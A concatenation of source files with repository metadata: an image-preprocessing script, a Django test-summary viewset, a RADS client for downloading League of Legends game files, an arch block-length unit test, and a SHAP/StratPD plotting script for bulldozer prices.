] | null | null | null | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
] | null | null | null | path = 'C:\\Users\\akash\\Pictures\\Sign-Language-Digits-Dataset-master\\Dataset\\'
import os
from PIL import Image
for i in range(3):
for filename in os.listdir(path + str(i)):
if filename != "":
image_obj = Image.open(path + str(i) + "\\" + filename).convert('L')
rotated_image = image_obj.transpose(Image.FLIP_LEFT_RIGHT)
rotated_image.save(path + "grayscale\\" + str(i) + "\\r_" + filename)
image_obj.save(path + "grayscale\\" + str(i) + "\\" + filename)
for filename in os.listdir(path + "invalid"):
if filename != "":
image_obj = Image.open(path + "invalid" + "\\" + filename).convert('L')
rotated_image = image_obj.transpose(Image.FLIP_LEFT_RIGHT)
rotated_image.save(path + "grayscale\\" + "invalid" + "\\r_" + filename)
image_obj.save(path + "grayscale\\" + "invalid" + "\\" + filename) | 50.666667 | 84 | 0.593202 | 110 | 912 | 4.772727 | 0.336364 | 0.091429 | 0.121905 | 0.057143 | 0.712381 | 0.697143 | 0.598095 | 0.350476 | 0.350476 | 0.350476 | 0 | 0.001425 | 0.230263 | 912 | 18 | 85 | 50.666667 | 0.746439 | 0 | 0 | 0.25 | 0 | 0 | 0.179628 | 0.081051 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3f25d0874f1f41b96cf0db0cf82de3fe58fb7d7 | 4,409 | py | Python | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 189 | 2020-03-17T17:18:58.000Z | 2022-02-22T09:49:45.000Z | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 598 | 2020-03-19T21:22:09.000Z | 2022-03-30T05:08:37.000Z | care/facility/summarisation/tests_summary.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 159 | 2020-03-19T18:45:56.000Z | 2022-03-17T13:23:12.000Z | from celery.decorators import periodic_task
from celery.schedules import crontab
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django_filters import rest_framework as filters
from rest_framework.mixins import ListModelMixin
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.viewsets import GenericViewSet
from care.facility.models import Facility, FacilityRelatedSummary, PatientSample
from care.facility.summarisation.facility_capacity import FacilitySummaryFilter, FacilitySummarySerializer
class TestsSummaryViewSet(ListModelMixin, GenericViewSet):
lookup_field = "external_id"
queryset = FacilityRelatedSummary.objects.filter(s_type="TestSummary").order_by("-created_date")
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FacilitySummarySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilitySummaryFilter
# def get_queryset(self):
# user = self.request.user
# queryset = self.queryset
# if user.is_superuser:
# return queryset
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["DistrictReadOnlyAdmin"]:
# return queryset.filter(facility__district=user.district)
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["StateReadOnlyAdmin"]:
# return queryset.filter(facility__state=user.state)
# return queryset.filter(facility__users__id__exact=user.id)
@method_decorator(cache_page(60 *60* 10))
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def tests_summary():
facilities = Facility.objects.all()
for facility in facilities:
facility_total_patients_count = facility.consultations.all().distinct("patient_id").count()
facility_patients_samples = PatientSample.objects.filter(consultation__facility_id=facility.id)
total_tests_count = facility_patients_samples.count()
results_positive_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["POSITIVE"]
).count()
results_awaited_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["AWAITING"]
).count()
results_negative_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["NEGATIVE"]
).count()
test_discarded_count = facility_patients_samples.filter(
result=PatientSample.SAMPLE_TEST_RESULT_MAP["INVALID"]
).count()
facility_tests_summarised_data = {
"facility_name": facility.name,
"district": facility.district.name,
"total_patients": facility_total_patients_count,
"total_tests": total_tests_count,
"result_positive": results_positive_count,
"result_awaited": results_awaited_count,
"result_negative": results_negative_count,
"test_discarded": test_discarded_count,
}
try:
facility_test_summary = FacilityRelatedSummary.objects.get(
s_type="TestSummary", created_date__startswith=timezone.now().date(), facility=facility
)
facility_test_summary.created_date = timezone.now()
facility_test_summary.data.pop("modified_date")
if not facility_test_summary.data == facility_tests_summarised_data:
facility_test_summary.data = facility_tests_summarised_data
latest_modification_date = timezone.now()
facility_test_summary.data.update(
{"modified_date": latest_modification_date.strftime("%d-%m-%Y %H:%M")}
)
facility_test_summary.save()
except ObjectDoesNotExist:
modified_date = timezone.now()
facility_tests_summarised_data.update({"modified_date": modified_date.strftime("%d-%m-%Y %H:%M")})
FacilityRelatedSummary.objects.create(
s_type="TestSummary", facility=facility, data=facility_tests_summarised_data
)
@periodic_task(run_every=crontab(hour=23, minute=59))
def run_midnight():
tests_summary()
| 46.904255 | 110 | 0.714901 | 459 | 4,409 | 6.544662 | 0.294118 | 0.034621 | 0.044274 | 0.055925 | 0.216378 | 0.194407 | 0.194407 | 0.15779 | 0.124501 | 0.124501 | 0 | 0.002835 | 0.200045 | 4,409 | 93 | 111 | 47.408602 | 0.84888 | 0.110456 | 0 | 0.055556 | 0 | 0 | 0.06878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0.013889 | 0.319444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3f8d6b9c7c673105416ad9c741ad2b778d84b31 | 23,272 | py | Python | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | 3 | 2020-11-10T19:37:41.000Z | 2022-03-18T11:37:15.000Z | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | 1 | 2020-11-30T00:46:44.000Z | 2020-11-30T06:57:19.000Z | bdragon/cdragontoolbox/rads.py | headbangsmurf/CommunityDataDragon | cc3307280dbaf61b4a2cab4bc953edb192a077bb | [
"MIT"
] | null | null | null | import os
import re
import zlib
from typing import List, Dict, Union, Optional, Generator, Iterable
from collections import defaultdict
import logging
import requests
from .data import Language
from .tools import write_file_or_remove
from .storage import (
BaseVersion,
Storage,
Patch,
PatchElement,
PatchVersion,
get_system_yaml_version,
get_exe_version,
)
logger = logging.getLogger(__name__)
class RadsVersion(BaseVersion):
"""Wrapper class for version strings used by RADS
Solutions and projects all have individual version numbers (e.g. "0.0.1.30").
The version numbers are actually 32-bit unsigned integers represented using dot-notation, exactly the same as the
notation used for IPv4 addresses. Notably, each individual number caps at 255, so the version after 0.0.0.255 is
0.0.1.0.
"""
def __init__(self, v: Union[str, tuple]):
super().__init__(v)
assert len(self.t) == 4, "invalid RADS version format: "
class RadsStorage(Storage):
"""
Storage based on RADS structure
Configuration options:
url -- storage URL (see examples below)
cdn -- 'default', 'kr' or 'pbe' (incompatible with 'url')
"""
storage_type = 'rads'
# all available values are in system.yaml
# values in use are in RADS/system/system.cfg
# region is ignored here (it is not actually needed)
DOWNLOAD_URL = "l3cdn.riotgames.com"
DOWNLOAD_PATH = "/releases/live"
DOWNLOAD_PATH_KR = "/KR_CBT"
DOWNLOAD_PATH_PBE = "/releases/pbe"
URL_DEFAULT = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH}/"
URL_KR = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH_KR}/"
URL_PBE = f"http://{DOWNLOAD_URL}{DOWNLOAD_PATH_PBE}/"
def __init__(self, path, url=None):
if url is None:
url = self.URL_DEFAULT
super().__init__(path, url)
@classmethod
def from_conf_data(cls, conf):
if 'cdn' in conf:
if 'url' in conf:
raise ValueError("'url' and 'cdn' are mutually exclusive")
url = getattr(cls, f"URL_{conf['cdn']}".upper())
else:
url = conf.get('url')
return cls(conf['path'], url)
def list_projects(self) -> List['RadsProject']:
"""List projects present in storage"""
ret = []
base = self.fspath("projects")
for name in os.listdir(base):
if os.path.isdir(f"{base}/{name}/releases"):
ret.append(RadsProject(self, name))
return ret
def list_solutions(self) -> List['RadsSolution']:
"""List solutions present in storage"""
ret = []
base = self.fspath("solutions")
for name in os.listdir(base):
if os.path.isdir(f"{base}/{name}/releases"):
ret.append(RadsSolution(self, name))
return ret
def patch_elements(self, stored=False):
solution_names = ('league_client_sln', 'lol_game_client_sln')
# peek next element for each solution
class Peeker:
def __init__(self, it):
self.it = it
self.cur = None
def peek(self):
if self.cur is None:
try:
self.cur = next(self.it)
except StopIteration:
pass
return self.cur
def consume(self):
assert self.cur is not None
self.cur = None
# drop solution versions without a patch
# convert them to patch elements
def gen_solution_elements(name):
solution = RadsSolution(self, name)
for sv in solution.versions(stored=stored):
patch = sv.patch_version()
if patch is None:
continue
yield RadsPatchElement(sv)
# for each solution, peek the next elements to yield the highest version
peekers = [Peeker(gen_solution_elements(name)) for name in solution_names]
while True:
best_peeker, best_elem = None, None
for peeker in peekers:
elem = peeker.peek()
if elem is None:
continue
if best_elem is None or elem.version > best_elem.version:
best_peeker, best_elem = peeker, elem
if best_peeker is None:
break # exhausted
yield best_elem
best_peeker.consume()
class RadsSolution:
"""A Solution has multiple versions and contains many Projects.
The Riot Application Distribution System (RADS) has two Solutions: `league_client_sln` and `lol_game_client_sln`.
The 'league_client_sln' contains data the client (LCU), and the `lol_game_client_sln` contains data for the game client.
These classes will likely work with other solutions, although some functionality may need to be extended.
There are multiple versions of a given solution, which can be accessed via the `.versions()` method.
All versions of a solution can be downloaded and extracted via the `.download()` method.
Each version of a solution contains multiple projects pertaining to different locales.
"""
def __init__(self, storage: RadsStorage, name):
self.storage = storage
self.path = f"solutions/{name}/releases"
self.name = name
def __str__(self):
return f"rads:{self.name}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name}>"
def __eq__(self, other):
if isinstance(other, RadsSolution):
return self.name == other.name
return False
def __hash__(self):
return hash(self.name)
def __lt__(self, other):
if isinstance(other, RadsSolution):
return self.name < other.name
return NotImplemented
def versions(self, stored=False) -> List['RadsSolutionVersion']:
"""Retrieve a sorted list of versions of this solution
If stored is True, only versions in storage are used (to avoid downloading new files).
"""
if stored:
fspath = self.storage.fspath(self.path)
if not os.path.isdir(fspath):
return [] # solution not in storage
listing = []
for path in os.listdir(fspath):
if not os.path.isdir(os.path.join(fspath, path)):
continue
listing.append(path)
else:
logger.debug(f"retrieve versions of {self}")
listing = self.storage.request_text(f"{self.path}/releaselisting").splitlines()
return sorted(RadsSolutionVersion(self, RadsVersion(l)) for l in listing)
def download(self, langs):
for v in self.versions():
v.download(langs)
class RadsSolutionVersion:
"""A single version of a RadsSolution.
Each RadsSolutionVersion contains data for multiple projects, accessible via the `RadsSolutionVersion.projects` method.
There is one "main" project, and one project for each language.
The data contained in a RadsSolutionVersion can be downloaded and extracted via the `.download()` method.
"""
def __init__(self, solution: RadsSolution, version: 'RadsVersion'):
self.path = f"{solution.path}/{version}"
self.solution = solution
self.version = version
def __str__(self):
return f"{self.solution}={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.solution.name}={self.version}>"
def __eq__(self, other):
if isinstance(other, RadsSolutionVersion):
return self.solution == other.solution and self.version == other.version
return False
def __hash__(self):
return hash((self.solution, self.version))
def __lt__(self, other):
if isinstance(other, RadsSolutionVersion):
if self.solution < other.solution:
return True
elif self.solution == other.solution:
return self.version > other.version
else:
return False
return NotImplemented
def dependencies(self) -> Dict[Union[Language, None], List['RadsProjectVersion']]:
"""Parse dependencies from the solutionmanifest
Return a map of project versions for each language.
The entry None is set to all required project versions.
"""
logger.debug(f"retrieve dependencies of {self}")
path = f"{self.path}/solutionmanifest"
self.solution.storage.download(path, path)
with open(self.solution.storage.fspath(path)) as f:
lines = f.read().splitlines()
assert lines[0] == "RADS Solution Manifest", "unexpected solutionmanifest magic line"
assert lines[1] == "1.0.0.0", "unexpected solutionmanifest version"
assert lines[2] == self.solution.name, "solution name mismatch in solutionmanifest header"
assert lines[3] == self.version, "solution version mismatch in solutionmanifest header"
idx = 4
required_projects = [] # [name, ...]
projects = {} # {name: RadsProjectVersion}
nprojects, idx = int(lines[idx]), idx + 1
for _ in range(nprojects):
(name, version, unk1, unk2), idx = lines[idx:idx+4], idx + 4
unk1, unk2 = int(unk1), int(unk2)
if unk1 == 0:
required_projects.append(name)
else:
assert unk1 == 10
assert unk2 == 0
projects[name] = RadsProjectVersion(RadsProject(self.solution.storage, name), RadsVersion(version))
langs = {} # {Language: [RadsProjectVersion, ...]}
nlangs, idx = int(lines[idx]), idx + 1
for _ in range(nlangs):
(lang, unk1, ndeps), idx = lines[idx:idx+3], idx + 3
unk1, ndeps = int(unk1), int(ndeps)
assert unk1 == 0
deps, idx = lines[idx:idx+ndeps], idx + ndeps
langs[Language(lang)] = [projects[name] for name in deps]
langs[None] = list(projects[name] for name in required_projects)
return langs
def projects(self, langs=True) -> List['RadsProjectVersion']:
"""Return a list of projects for provided language(s)"""
dependencies = self.dependencies()
if langs is False:
return dependencies[None]
elif langs is True:
return list({pv for pvs in dependencies.values() for pv in pvs})
elif isinstance(langs, Language):
return dependencies[langs]
else:
return list({pv for lang in langs for pv in dependencies[lang]})
def filepaths(self, langs) -> Generator[str, None, None]:
"""Generate the extract path of files in the solution version"""
for pv in self.projects(langs):
yield from pv.filepaths()
def download(self, langs=True):
"""Download solution version files"""
logger.info(f"downloading solution {self}")
for pv in self.projects(langs):
pv.download()
def patch_version(self) -> Optional[PatchVersion]:
"""Return patch version or None if there is None
This method reads/writes version from/to cache.
"""
# for PBE: version is always "main"
if self.solution.storage.url == RadsStorage.URL_PBE:
return PatchVersion("main")
cache = self.solution.storage.fspath(f"{self.path}/_patch_version")
if os.path.isfile(cache):
logger.debug(f"retrieving patch version for {self} from cache")
with open(cache) as f:
version = f.read().strip()
version = PatchVersion(version) if version else None
else:
version = self._retrieve_patch_version()
if version is None:
logger.warning(f"failed to retrieve patch version for {self}")
else:
with open(cache, 'w') as f:
f.write(f"{version}\n")
return version
def _retrieve_patch_version(self) -> Optional[PatchVersion]:
"""Retrieve patch version from game files (no cache handling)
Return None if there is no patch version (because files are not
available anymore on Riot's CDN).
Raise an exception if patch version cannot be retrieved.
"""
logger.debug(f"retrieving patch version for {self}")
retrievers = {
# solution_name: (project_name, file_name, extractor)
'league_client_sln': (
'league_client',
'system.yaml',
get_system_yaml_version,
),
'lol_game_client_sln': (
'lol_game_client',
'League of Legends.exe',
get_exe_version,
),
}
try:
project_name, file_name, extractor = retrievers[self.solution.name]
except KeyError:
raise RuntimeError(f"no known way to retrieve patch version for solution {self.solution.name}")
for pv in self.projects(False):
if pv.project.name == project_name:
break
else:
raise ValueError(f"{project_name} project not found for {self}")
try:
filepaths = pv.filepaths()
except requests.exceptions.HTTPError as e:
# some packagemanifest files are not available anymore
# for these project versions, there is no patch version
if e.response is not None and e.response.status_code == 404:
return None
raise
path_suffix = f'/{file_name}'
for path in filepaths:
if path.endswith(path_suffix):
fspath = self.solution.storage.fspath(path)
if not os.path.isfile(path):
pv.extract([path])
break
else:
# packagemanifest for league_client<=0.0.0.43 doesn't alway contain system.yaml
if pv.project.name == 'league_client' and pv.version <= RadsVersion('0.0.0.43'):
return None
raise ValueError(f"'{file_name}' not found for {pv}")
version = extractor(fspath)
return PatchVersion(version)
class RadsProject:
"""A RadsProject is a subset of data for a specific locale, or the data for the main/default/common locale.
There are multiple versions of a given project, which can be accessed via the `.versions()` method.
All versions of the project can be downloaded and extracted via the `.download()` method.
The data in ProjectVersions are contained in Bin files, which are extracted.
"""
def __init__(self, storage: RadsStorage, name):
self.storage = storage
self.path = f"projects/{name}/releases"
self.name = name
def __str__(self):
return f"rads:{self.name}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.name}>"
def __eq__(self, other):
if isinstance(other, RadsProject):
return self.name == other.name
return False
def __hash__(self):
return hash(self.name)
def __lt__(self, other):
if isinstance(other, RadsProject):
return self.name < other.name
return NotImplemented
def versions(self) -> List['RadsProjectVersion']:
"""Retrieve the list of versions of this project"""
logger.debug(f"retrieve versions of {self}")
listing = self.storage.request_text(f"{self.path}/releaselisting")
return [RadsProjectVersion(self, RadsVersion(l)) for l in listing.splitlines()]
def download(self):
for v in self.versions():
v.download()
class RadsProjectVersion:
"""A single version of a RadsProject.
The data contained in a project can be downloaded and extracted via the `.download()` method.
The data in these ProjectVersions are contained in Bin files, which are extracted.
"""
def __init__(self, project: RadsProject, version: 'Version'):
self.path = f"{project.path}/{version}"
self.project = project
self.version = version
self._package_files = None # {extract_path: BinPackageFile}
def __str__(self):
return f"{self.project}={self.version}"
def __repr__(self):
return f"<{self.__class__.__qualname__} {self.project.name}={self.version}>"
def __eq__(self, other):
if isinstance(other, RadsProjectVersion):
return self.project == other.project and self.version == other.version
return False
def __hash__(self):
return hash((self.project, self.version))
def __lt__(self, other):
if isinstance(other, RadsProjectVersion):
if self.project < other.project:
return True
elif self.project == other.project:
return self.version > other.version
else:
return False
return NotImplemented
def _get_package_files(self) -> Dict[str, 'BinPackageFile']:
"""Retrieve files from packagemanifest"""
if self._package_files is None:
manifest_path = f"{self.path}/packagemanifest"
manifest_urlpath = f"{self.path}/packages/files/packagemanifest"
self.project.storage.download(manifest_urlpath, manifest_path)
files = BinPackageFile.from_package_manifest(self.project.storage.fspath(manifest_path))
self._package_files = {pf.extract_path: pf for pf in files}
return self._package_files
def filepaths(self) -> Dict[str, 'BinPackageFile']:
"""Generate the extract path of files in the project version"""
return self._get_package_files()
def extract(self, paths=None):
"""Download packages and extract files
A subset of paths to extract can be provided (they must exist in the project version).
"""
all_files = self._get_package_files()
if paths is None:
extracted_files = all_files.values()
else:
extracted_files = [all_files[path] for path in paths]
# filter already extracted file
extracted_files = [pf for pf in extracted_files if not os.path.isfile(self.project.storage.fspath(pf.extract_path))]
# group files by package
files_by_package = defaultdict(list)
for pf in extracted_files:
files_by_package[pf.package].append(pf)
package_files_path = f"{self.path}/packages/files"
for package, files in files_by_package.items():
with self.project.storage.stream(f"{package_files_path}/{package}") as reader:
# sort files by offset to extract while streaming the bin file
for pkgfile in sorted(files, key=lambda f: f.offset):
logger.debug(f"extracting {pkgfile.path}")
reader.skip_to(pkgfile.offset)
fspath = self.project.storage.fspath(pkgfile.extract_path)
with write_file_or_remove(fspath) as fout:
if pkgfile.compressed:
zobj = zlib.decompressobj(zlib.MAX_WBITS | 32)
def writer(data):
return fout.write(zobj.decompress(data))
reader.copy(writer, pkgfile.size)
fout.write(zobj.flush())
else:
reader.copy(fout.write, pkgfile.size)
def download(self):
"""Download project version files"""
logger.info(f"downloading project {self}")
self.project.storage.download(f"{self.path}/releasemanifest", None)
self.extract()
class RadsPatchElement(PatchElement):
"""Patch element from a RADS storage"""
solution_name_to_element_name = {
'league_client_sln': 'client',
'lol_game_client_sln': 'game',
}
def __init__(self, sv: RadsSolutionVersion):
name = self.solution_name_to_element_name[sv.solution.name]
version = sv.patch_version()
if version is None:
raise ValueError(f"unknown patch version for {sv}")
super().__init__(name, version)
self.solution_version = sv
def download(self, langs=True):
self.solution_version.download(langs=langs)
def fspaths(self, langs=True):
sv = self.solution_version
storage = sv.solution.storage
return (storage.fspath(path) for path in sv.filepaths(langs=langs))
def relpaths(self, langs=True):
sv = self.solution_version
return (path.split('/', 5)[5].lower() for path in sv.filepaths(langs=langs))
def paths(self, langs=True):
sv = self.solution_version
storage = sv.solution.storage
for path in sv.filepaths(langs=langs):
yield (storage.fspath(path), path.split('/', 5)[5].lower())
class BinPackageFile:
"""A single file in a BIN package"""
__slots__ = ('path', 'package', 'offset', 'size', 'compressed', 'extract_path')
def __init__(self, line):
path, self.package, offset, size, typ = line.split(',')
self.path = path[1:] # remove leading '/'
self.offset = int(offset)
self.size = int(size)
self.compressed = self.path.endswith('.compressed')
if self.compressed:
self.extract_path = self.path[:-11] # remove the '.compressed' suffix
else:
self.extract_path = self.path
def __str__(self):
return f"<{self.__class__.__name__} {self.path!r}>"
@classmethod
def from_package_manifest(cls, path) -> Generator['BinPackageFile', None, None]:
with open(path) as f:
line = f.readline()
assert line.startswith('PKG1'), "unexpected packagemanifest magic line"
for line in f:
yield cls(line)
def parse_rads_component(storage: RadsStorage, component: str):
"""Parse a component string representation to an object"""
m = re.match(r'^(?:([sp]):)?(\w+)(?:=(|[0-9]+(?:\.[0-9]+)*|main)?)?$', component)
if not m:
raise ValueError(f"invalid component: {component}")
typ, name, version = m.group(1, 2, 3)
if not typ:
if name == 'patch':
typ = 'patch'
elif name.endswith('_sln'):
typ = 's'
else:
typ = 'p'
if typ == 'p':
project = RadsProject(storage, name)
if version is None:
return project
elif version == '':
return project.versions()[0]
else:
return RadsProjectVersion(project, RadsVersion(version))
elif typ == 's':
solution = RadsSolution(storage, name)
if version is None:
return solution
elif version == '':
return solution.versions()[0]
else:
return RadsSolutionVersion(solution, RadsVersion(version))
elif typ == 'patch':
if version is None:
raise ValueError(f"patch requires a version")
elif version == '':
return storage.patch(None)
else:
return storage.patch(version)
| 36.419405 | 124 | 0.606179 | 2,739 | 23,272 | 5.016429 | 0.147499 | 0.020087 | 0.007205 | 0.012227 | 0.309534 | 0.232096 | 0.204731 | 0.17329 | 0.157569 | 0.140539 | 0 | 0.005354 | 0.293744 | 23,272 | 638 | 125 | 36.476489 | 0.830616 | 0.181849 | 0 | 0.297483 | 0 | 0 | 0.124143 | 0.039042 | 0 | 0 | 0 | 0 | 0.022883 | 1 | 0.132723 | false | 0.002288 | 0.022883 | 0.032037 | 0.343249 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3fb508751b27387b839402708cd6c7d5ae12cf0 | 935 | py | Python | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 1 | 2022-03-29T22:12:54.000Z | 2022-03-29T22:12:54.000Z | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/arch/tests/bootstrap/test_block_length.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | null | null | null | import numpy as np
from numpy.testing import assert_allclose
import pandas as pd
from arch.bootstrap.base import optimal_block_length
def test_block_length():
rs = np.random.RandomState(0)
e = rs.standard_normal(10000 + 100)
y = e
for i in range(1, len(e)):
y[i] = 0.3 * y[i - 1] + e[i]
s = pd.Series(y[100:], name="x")
bl = optimal_block_length(s)
sb, cb = bl.loc["x"]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
df = pd.DataFrame([s, s]).T
df.columns = ["x", "y"]
bl = optimal_block_length(df)
for idx in ("x", "y"):
sb, cb = bl.loc[idx]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
assert tuple(bl.columns) == ("stationary", "circular")
assert tuple(bl.index) == ("x", "y")
bl = optimal_block_length(np.asarray(df))
assert tuple(bl.index) == (0, 1)
| 28.333333 | 58 | 0.610695 | 154 | 935 | 3.603896 | 0.38961 | 0.126126 | 0.12973 | 0.108108 | 0.299099 | 0.299099 | 0.21982 | 0.21982 | 0.21982 | 0.21982 | 0 | 0.077241 | 0.224599 | 935 | 32 | 59 | 29.21875 | 0.688276 | 0 | 0 | 0.153846 | 0 | 0 | 0.027807 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3fc69ae17afb4191989d8ffd0210a58f43c6b8b | 2,836 | py | Python | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 54 | 2019-07-17T04:59:39.000Z | 2022-03-18T15:25:00.000Z | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 5 | 2019-07-27T16:18:37.000Z | 2020-12-02T20:16:49.000Z | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 13 | 2019-08-08T22:17:50.000Z | 2022-02-11T10:19:23.000Z | from support import *
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import shap
GREY = '#444443'
n = 20_000
shap_test_size = 1000
X, y = load_bulldozer(n=50_000)
# Most recent timeseries data is more relevant so get big recent chunk
# then we can sample from that to get n
X = X.iloc[-50_000:]
y = y.iloc[-50_000:]
idxs = resample(range(50_000), n_samples=n, replace=False)
X_, y_ = X.iloc[idxs], y.iloc[idxs]
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
ax.scatter(X_['age'], y_, s=3, alpha=.1, c='#1E88E5')
ax.set_xlabel("age\n(a)", fontsize=13)
ax.set_ylabel("SalePrice ($)", fontsize=13)
ax.set_title("Marginal plot", fontsize=13)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-marginal.pdf", bbox_inches="tight", pad_inches=0)
plt.show()
rf = RandomForestRegressor(n_estimators=40, n_jobs=-1)
rf.fit(X_, y_)
explainer = shap.TreeExplainer(rf, data=shap.sample(X_, 100),
feature_perturbation='interventional')
shap_values = explainer.shap_values(X.sample(n=shap_test_size),
check_additivity=False)
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
shap.dependence_plot("age", shap_values, X_.sample(n=shap_test_size),
interaction_index=None, ax=ax, dot_size=5,
show=False, alpha=.5)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
ax.set_ylabel("Impact on SalePrice\n(age SHAP)")
ax.set_xlabel("age\n(b)")
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-shap.pdf", bbox_inches="tight", pad_inches=0)
plt.show()
# Now show StratPD
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
plot_stratpd(X_, y_, colname='age', targetname='SalePrice',
show_slope_lines=False,
show_impact=False,
label_fontsize=13,
figsize=(3.8,3.2),
ax=ax
)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
ax.set_ylabel("SalePrice ($)", fontsize=13)
ax.set_xlabel("age\n(c)", fontsize=13)
ax.tick_params(axis='both', which='major', labelsize=11)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-stratpd.pdf", bbox_inches="tight", pad_inches=0)
plt.show() | 31.511111 | 86 | 0.681946 | 453 | 2,836 | 4.092715 | 0.293598 | 0.07767 | 0.033981 | 0.048544 | 0.581446 | 0.559871 | 0.55178 | 0.55178 | 0.377562 | 0.320928 | 0 | 0.039328 | 0.139281 | 2,836 | 90 | 87 | 31.511111 | 0.720197 | 0.043371 | 0 | 0.42029 | 0 | 0 | 0.141697 | 0.038007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.072464 | 0 | 0.072464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
